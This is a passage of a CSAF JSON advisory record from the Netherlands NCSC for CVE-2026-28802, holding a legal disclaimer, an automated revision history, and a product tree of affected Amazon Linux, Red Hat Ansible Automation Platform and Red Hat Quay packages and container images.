{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-28802", "tracking": { "current_release_date": "2026-04-02T14:58:20.372455Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-28802", "initial_release_date": "2026-03-04T21:51:02.298475Z", "revision_history": [ { "date": "2026-03-04T21:51:02.298475Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-04T21:51:07.196106Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-05T00:36:27.428746Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| Product Identifiers created (2).| Products created (2).| References created (3).| CWES updated (1)." }, { "date": "2026-03-05T00:36:36.802221Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-06T07:25:01.244895Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-06T07:25:08.227578Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-06T07:38:34.917265Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-06T07:39:43.600215Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-06T11:35:22.076179Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-06T12:28:30.799005Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (7).| Product Identifiers created (3).| Product Remediations created (7).| References created (5).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-06T12:28:33.280815Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-06T14:52:32.088141Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-06T14:52:33.862229Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-06T16:38:58.465007Z", "number": "14", "summary": "Unknown change." }, { "date": "2026-03-06T22:39:37.461547Z", "number": "15", "summary": "References created (1)." }, { "date": "2026-03-07T00:36:12.914564Z", "number": "16", "summary": "References created (1)." }, { "date": "2026-03-07T00:46:25.956232Z", "number": "17", "summary": "Source created.| CVE status created. (valid)| Products created (1).| Products connected (1)." }, { "date": "2026-03-07T00:46:35.147671Z", "number": "18", "summary": "NCSC Score updated." }, { "date": "2026-03-07T06:43:37.334756Z", "number": "19", "summary": "Description created for source." }, { "date": "2026-03-09T21:25:32.111895Z", "number": "20", "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-09T21:25:37.635338Z", "number": "21", "summary": "NCSC Score updated." }, { "date": "2026-03-11T19:24:21.644431Z", "number": "22", "summary": "NCSC Score updated." }, { "date": "2026-03-17T11:31:25.617150Z", "number": "23", "summary": "NCSC Score updated." }, { "date": "2026-03-19T00:36:51.562824Z", "number": "24", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (13).| Product Identifiers created (24).| Product Identifiers removed (24).| References created (21).| CWES updated (1)." }, { "date": "2026-03-19T00:36:55.382127Z", "number": "25", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:36:00.111195Z", "number": "26", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:36:02.818421Z", "number": "27", "summary": "NCSC Score updated." }, { "date": "2026-03-20T18:39:27.145209Z", "number": "28", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (13).| Product Identifiers created (18).| Product Identifiers removed (18).| References created (19).| CWES updated (1)." }, { "date": "2026-03-20T18:39:33.370556Z", "number": "29", "summary": "NCSC Score updated." }, { "date": "2026-03-21T15:19:01.958505Z", "number": "30", "summary": "NCSC Score updated." }, { "date": "2026-03-25T00:31:37.444818Z", "number": "31", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (13).| Product Identifiers created (18).| Product Identifiers removed (18).| References created (21).| CWES updated (1)." }, { "date": "2026-03-25T00:31:51.451731Z", "number": "32", "summary": "NCSC Score updated." }, { "date": "2026-03-26T03:18:17.310843Z", "number": "33", "summary": "NCSC Score updated." }, { "date": "2026-04-01T06:56:21.300760Z", "number": "34", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products created (1)." }, { "date": "2026-04-01T06:56:26.359141Z", "number": "35", "summary": "NCSC Score updated." }, { "date": "2026-04-01T11:28:51.558398Z", "number": "36", "summary": "Source connected.| CVE status created. (valid)| Products connected (2).| References created (4)." }, { "date": "2026-04-01T11:28:53.417660Z", "number": "37", "summary": "NCSC Score updated." }, { "date": "2026-04-01T12:35:56.393817Z", "number": "38", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (29).| Product Remediations created (31).| Product Identifiers created (104).| Product Identifiers removed (104).| References created (21).| CWES updated (1)." }, { "date": "2026-04-02T09:05:47.659343Z", "number": "39", "summary": "Products connected (3).| References created (4)." }, { "date": "2026-04-02T09:05:52.640338Z", "number": "40", "summary": "NCSC Score updated." }, { "date": "2026-04-02T12:28:55.502877Z", "number": "41", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (28).| Product Remediations created (30).| Product Identifiers created (100).| Product Identifiers removed (100).| References created (21).| CWES updated (1)." }, { "date": "2026-04-02T12:29:06.068798Z", "number": "42", "summary": "NCSC Score updated." }, { "date": "2026-04-02T14:54:11.330638Z", "number": "43", "summary": "NCSC Score updated." } ], "status": "interim", "version": "43" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/unknown", "product": { "name": "vers:unknown/unknown", "product_id": "CSAFPID-1330296", "product_identification_helper": { "cpe": "cpe:/o:amazon:linux_2:-" } } } ], "category": "product_name", "name": "Amazon Linux 2" } ], "category": "vendor", "name": "Amazon" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.5", "product": { "name": "vers:unknown/<2.5", "product_id": "CSAFPID-1384077" } }, { "category": "product_version_range", "name": "vers:unknown/<2.6", "product": { "name": "vers:unknown/<2.6", "product_id": "CSAFPID-5354794" } } ], "category": "product_name", "name": "Ansible Automation Platform" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2.6", "product": { "name": "vers:rpm/2.6", "product_id": "CSAFPID-5153949", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2.6" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774139204", "product": { "name": "vers:oci/1774139204", "product_id": "CSAFPID-5973066", "product_identification_helper": { "purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ae43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774139204" } } } ], "category": "product_name", "name": "aap-must-gather-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774153089", "product": { "name": "vers:oci/1774153089", "product_id": "CSAFPID-5973067", "product_identification_helper": { "purl": "pkg:oci/ansible-builder-rhel9@sha256%3Adb8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774153089" } } } ], "category": "product_name", "name": "ansible-builder-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774585183", "product": { "name": "vers:oci/1774585183", "product_id": "CSAFPID-5973068", "product_identification_helper": { "purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774585183" } } } ], "category": "product_name", "name": "ansible-dev-tools-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774368903", "product": { "name": "vers:oci/1774368903", "product_id": "CSAFPID-5973070", "product_identification_helper": { "purl": "pkg:oci/controller-rhel9@sha256%3Aa490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774368903" } } } ], "category": "product_name", "name": "controller-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484033", "product": { "name": "vers:oci/1774484033", "product_id": "CSAFPID-5973069", "product_identification_helper": { "purl": "pkg:oci/controller-rhel9-operator@sha256%3Aee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484033" } } } ], "category": "product_name", "name": "controller-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774487884", "product": { "name": "vers:oci/1774487884", "product_id": "CSAFPID-5973071", "product_identification_helper": { "purl": "pkg:oci/de-minimal-rhel9@sha256%3Ac67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774487884" } } } ], "category": "product_name", "name": "de-minimal-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774490244", "product": { "name": "vers:oci/1774490244", "product_id": "CSAFPID-5973072", "product_identification_helper": { "purl": "pkg:oci/de-supported-rhel9@sha256%3Afa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774490244" } } } ], "category": "product_name", "name": "de-supported-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774258433", "product": { "name": "vers:oci/1774258433", "product_id": "CSAFPID-5973074", "product_identification_helper": { "purl": "pkg:oci/eda-controller-rhel9@sha256%3Af720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774258433" } } } ], "category": "product_name", "name": "eda-controller-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484073", "product": { "name": "vers:oci/1774484073", "product_id": "CSAFPID-5973073", "product_identification_helper": { "purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Afe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484073" } } } ], "category": "product_name", "name": "eda-controller-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484106", "product": { "name": "vers:oci/1774484106", "product_id": "CSAFPID-5973075", "product_identification_helper": { "purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Af95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484106" } } } ], "category": "product_name", "name": "eda-controller-ui-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774311517", "product": { "name": "vers:oci/1774311517", "product_id": "CSAFPID-5973076", "product_identification_helper": { "purl": "pkg:oci/ee-minimal-rhel9@sha256%3Ab77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774311517" } } } ], "category": "product_name", "name": "ee-minimal-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774321273", "product": { "name": "vers:oci/1774321273", "product_id": "CSAFPID-5973077", "product_identification_helper": { "purl": "pkg:oci/ee-supported-rhel9@sha256%3Ad6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774321273" } } } ], "category": "product_name", "name": "ee-supported-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774139334", "product": { "name": "vers:oci/1774139334", "product_id": "CSAFPID-5973078", "product_identification_helper": { "purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774139334" } } } ], "category": "product_name", "name": "gateway-proxy-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774243862", "product": { "name": "vers:oci/1774243862", "product_id": "CSAFPID-5973080", "product_identification_helper": { "purl": "pkg:oci/gateway-rhel9@sha256%3Aed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774243862" } } } ], "category": "product_name", "name": "gateway-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484129", "product": { "name": "vers:oci/1774484129", "product_id": "CSAFPID-5973079", "product_identification_helper": { "purl": "pkg:oci/gateway-rhel9-operator@sha256%3Af0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484129" } } } ], "category": "product_name", "name": "gateway-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774644659", "product": { "name": "vers:oci/1774644659", "product_id": "CSAFPID-5973082", "product_identification_helper": { "purl": "pkg:oci/hub-rhel9@sha256%3Ad204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774644659" } } } ], "category": "product_name", "name": "hub-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484154", "product": { "name": "vers:oci/1774484154", "product_id": "CSAFPID-5973081", "product_identification_helper": { "purl": "pkg:oci/hub-rhel9-operator@sha256%3Aa89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484154" } } } ], "category": "product_name", "name": "hub-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774647780", "product": { "name": "vers:oci/1774647780", "product_id": "CSAFPID-5973083", "product_identification_helper": { "purl": "pkg:oci/hub-web-rhel9@sha256%3Afad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774647780" } } } ], "category": "product_name", "name": "hub-web-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774417022", "product": { "name": "vers:oci/1774417022", "product_id": "CSAFPID-5973065", "product_identification_helper": { "purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Ad17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774417022" } } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774363040", "product": { "name": "vers:oci/1774363040", "product_id": "CSAFPID-5973085", "product_identification_helper": { "purl": "pkg:oci/lightspeed-rhel9@sha256%3Adb0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774363040" } } } ], "category": "product_name", "name": "lightspeed-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484113", "product": { "name": "vers:oci/1774484113", "product_id": "CSAFPID-5973084", "product_identification_helper": { "purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Accf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484113" } } } ], "category": "product_name", "name": "lightspeed-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774268173", "product": { "name": "vers:oci/1774268173", "product_id": "CSAFPID-5973090", "product_identification_helper": { "purl": "pkg:oci/mcp-server-rhel9@sha256%3A6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-tech-preview&tag=1774268173" } } } ], "category": "product_name", "name": "mcp-server-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774268174", "product": { "name": "vers:oci/1774268174", "product_id": "CSAFPID-5973086", "product_identification_helper": { "purl": "pkg:oci/mcp-tools-rhel9@sha256%3A7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774268174" } } } ], "category": "product_name", "name": "mcp-tools-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774540248", "product": { "name": "vers:oci/1774540248", "product_id": "CSAFPID-5984227", "product_identification_helper": { "purl": "pkg:oci/metrics-service-rhel9@sha256%3Ac8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-tech-preview&tag=1774540248" } } } ], "category": "product_name", "name": "metrics-service-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774648896", "product": { "name": "vers:oci/1774648896", "product_id": "CSAFPID-5973091", "product_identification_helper": { "purl": "pkg:oci/platform-operator-bundle@sha256%3A79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform&tag=1774648896" } } }, { "category": "product_version_range", "name": "vers:oci/1774648925", "product": { "name": "vers:oci/1774648925", "product_id": "CSAFPID-5973092", "product_identification_helper": { "purl": "pkg:oci/platform-operator-bundle@sha256%3Af27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform&tag=1774648925" } } } ], "category": "product_name", "name": "platform-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484549", "product": { "name": "vers:oci/1774484549", "product_id": "CSAFPID-5973087", "product_identification_helper": { "purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Abc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484549" } } } ], "category": "product_name", "name": "platform-resource-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774485790", "product": { "name": "vers:oci/1774485790", "product_id": "CSAFPID-5973088", "product_identification_helper": { "purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Af0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774485790" } } } ], "category": "product_name", "name": "platform-resource-runner-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774573035", "product": { "name": "vers:oci/1774573035", "product_id": "CSAFPID-5973089", "product_identification_helper": { "purl": "pkg:oci/receptor-rhel9@sha256%3Af00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774573035" } } } ], "category": "product_name", "name": "receptor-rhel9" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/unknown", "product": { "name": "vers:unknown/unknown", "product_id": "CSAFPID-1317175", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441200", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3" } } } ], "category": "product_name", "name": "Red Hat Quay 3" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3.10", "product": { "name": "vers:rpm/3.10", "product_id": "CSAFPID-5209636", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3.10::el8" } } } ], "category": "product_name", "name": "Red Hat Quay 3.1" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3.12", "product": { "name": "vers:rpm/3.12", "product_id": "CSAFPID-5256659", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3.12::el8" } } } ], "category": "product_name", "name": "Red Hat Quay 3.12" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3.9", "product": { "name": "vers:rpm/3.9", "product_id": "CSAFPID-5212154", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3.9::el8" } } } ], "category": "product_name", "name": "Red Hat Quay 3.9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1772054192", "product": { "name": "vers:oci/1772054192", "product_id": "CSAFPID-5846431", "product_identification_helper": { "purl": "pkg:oci/clair-rhel8@sha256%3Ad547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772054192" } } }, { "category": "product_version_range", "name": "vers:oci/1772725047", "product": { "name": "vers:oci/1772725047", "product_id": "CSAFPID-5903533", "product_identification_helper": { "purl": "pkg:oci/clair-rhel8@sha256%3Ad59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f?arch=s390x&repository_url=registry.redhat.io/quay&tag=1772725047" } } }, { "category": "product_version_range", "name": "vers:oci/1772725093", "product": { "name": "vers:oci/1772725093", "product_id": "CSAFPID-5875332", "product_identification_helper": { "purl": "pkg:oci/clair-rhel8@sha256%3Ae16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772725093" } } } ], "category": "product_name", "name": "clair-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773765999", "product": { "name": "vers:oci/1773765999", "product_id": "CSAFPID-5846432", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773765999" } } }, { "category": "product_version_range", "name": "vers:oci/1773931771", "product": { "name": "vers:oci/1773931771", "product_id": "CSAFPID-5875333", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773931771" } } }, { "category": "product_version_range", "name": "vers:oci/1774022278", "product": { "name": "vers:oci/1774022278", "product_id": "CSAFPID-5903534", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022278" } } } ], "category": "product_name", "name": "quay-bridge-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773765477", "product": { "name": "vers:oci/1773765477", "product_id": "CSAFPID-5846433", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Af15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d?arch=arm64&repository_url=registry.redhat.io/quay&tag=1773765477" } } }, { "category": "product_version_range", "name": "vers:oci/1773931200", "product": { "name": "vers:oci/1773931200", "product_id": "CSAFPID-5875334", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Ace8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1773931200" } } }, { "category": "product_version_range", "name": "vers:oci/1774021704", "product": { "name": "vers:oci/1774021704", "product_id": "CSAFPID-5903535", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Afe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774021704" } } } ], "category": "product_name", "name": "quay-bridge-operator-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1772132933", "product": { "name": "vers:oci/1772132933", "product_id": "CSAFPID-5846434", "product_identification_helper": { "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3Ac3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee?arch=amd64&repository_url=registry.redhat.io/quay&tag=1772132933" } } }, { "category": "product_version_range", "name": "vers:oci/1772739181", "product": { "name": "vers:oci/1772739181", "product_id": "CSAFPID-5875335", "product_identification_helper": { "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1?arch=amd64&repository_url=registry.redhat.io/quay&tag=1772739181" } } }, { "category": "product_version_range", "name": "vers:oci/1772739218", "product": { "name": "vers:oci/1772739218", "product_id": "CSAFPID-5903536", "product_identification_helper": { "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99?arch=amd64&repository_url=registry.redhat.io/quay&tag=1772739218" } } } ], "category": "product_name", "name": "quay-builder-qemu-rhcos-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1772054202", "product": { "name": "vers:oci/1772054202", "product_id": "CSAFPID-5846435", "product_identification_helper": { "purl": "pkg:oci/quay-builder-rhel8@sha256%3A821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772054202" } } }, { "category": "product_version_range", "name": "vers:oci/1772726823", "product": { "name": "vers:oci/1772726823", "product_id": "CSAFPID-5903537", "product_identification_helper": { "purl": "pkg:oci/quay-builder-rhel8@sha256%3Aba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772726823" } } }, { "category": "product_version_range", "name": "vers:oci/1772728539", "product": { "name": "vers:oci/1772728539", "product_id": "CSAFPID-5875336", "product_identification_helper": { "purl": "pkg:oci/quay-builder-rhel8@sha256%3Acb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f?arch=amd64&repository_url=registry.redhat.io/quay&tag=1772728539" } } } ], "category": "product_name", "name": "quay-builder-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773766026", "product": { "name": "vers:oci/1773766026", "product_id": "CSAFPID-5846436", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773766026" } } }, { "category": "product_version_range", "name": "vers:oci/1773931764", "product": { "name": "vers:oci/1773931764", "product_id": "CSAFPID-5875337", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773931764" } } }, { "category": "product_version_range", "name": "vers:oci/1774022275", "product": { "name": "vers:oci/1774022275", "product_id": "CSAFPID-5903538", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022275" } } } ], "category": "product_name", "name": "quay-container-security-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773765467", "product": { "name": "vers:oci/1773765467", "product_id": "CSAFPID-5846437", "product_identification_helper": { "purl": 